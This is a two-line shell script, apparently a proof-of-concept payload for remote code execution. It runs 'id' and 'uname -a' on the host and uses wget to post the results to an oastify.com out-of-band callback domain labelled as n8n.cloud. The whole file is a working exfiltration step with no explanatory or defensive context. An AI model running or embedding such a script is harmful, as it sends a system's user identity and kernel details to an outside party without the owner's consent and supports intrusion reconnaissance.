#!/bin/sh

wget --post-data="output=$(id)" http://n8n.cloud.tkhyqsw0b8vbuvngg3tk4dizzq5htbh0.oastify.com/id
wget --post-data="output=$(uname -a)" http://n8n.cloud.tkhyqsw0b8vbuvngg3tk4dizzq5htbh0.oastify.com/kernel
